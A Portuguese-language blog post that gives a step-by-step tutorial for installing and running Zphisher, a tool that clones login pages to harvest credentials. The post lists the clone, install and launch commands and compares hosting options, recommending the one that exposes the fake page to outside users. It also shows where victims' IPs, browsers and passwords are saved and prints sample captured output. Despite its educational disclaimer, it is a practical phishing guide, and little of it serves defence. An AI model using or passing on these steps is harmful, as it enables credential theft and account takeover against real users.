Início

ZPHISHER

Este artigo é para fins educacionais e tem a intenção de demonstrar ataques de phishing.

O Zphisher é uma ferramenta que automatiza a “clonagem” de 30+ telas de login das plataformas mais utilizadas hoje.
Pré-requisitos: distribuição linux (debian, ubuntu, kali, fedora entre outras) ou termux,
Pacotes necessários: git, curl e php

Processo de instalação (script github):
1. Faça download do zphisher em sua máquina:
git clone https://github.com/htr-tech/zphisher
.
2. Acesse a pasta do zphisher:
cd zphisher
.
3. Atualize seu repositório, pois a script irá instalar as dependências:
sudo apt update (debian e baseados neles)
sudo dnf update (RHEL e baseados nele)
sudo zypper --refresh (OpenSuse)
.
4. Execute a script e aguarde a tela de seleção da plataforma:
./zphisher.sh

5. Selecione o local que irá hospedar o ataque:

Onde, Localhost: hospedado na própria máquina acessando pelo navegador usando o próprio IP ou 127.0.0.1.
Cloudflared: hospeda em servidores da cloudflare, porém é facilmente detectado como phishing.
LocalXpose: Ferramenta para expor o localhost para acessos externos (dura apenas 15 min)
Para demonstração irei utilizar localhost, porém a melhora maneira é LocalXpose.
.
6. Deseja alterar a porta padrão? (127.0.0.1:8080)
[?] Do You Want A Custom Port [y/N]: N
.
7. Acesse pelo navegador o localhost e a página de login já estará funcionando, insira um email aleatório e uma senha aleatória que deseja capturar:

8. É possível visualizar as informações em tempo real enquanto a script é executada:


8. Verificando as informações coletadas: Acesse a pasta zphisher/auth:
cd auth
.
9. Dentro da pasta existe 2 arquivos:
ip.txt: (registra o IP, navegador, sistema operacional entre outros da vítima)
usernames.dat: Plataforma utilizada, login e senha da vítima.
cat ip.txt
IP: 200.245.9.194
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0

IP: 200.245.9.194
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
.
cat username.dat
Gmail Username: jorgecarneiroblog@gmail.com Pass: testedesenha

Obrigado por ler até aqui.
Espero te ajudado.
Duvidas? Deixe nos comentários.

Publicado

em

por

jcarneiro

Tags:

, , , , ,

Comentários

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *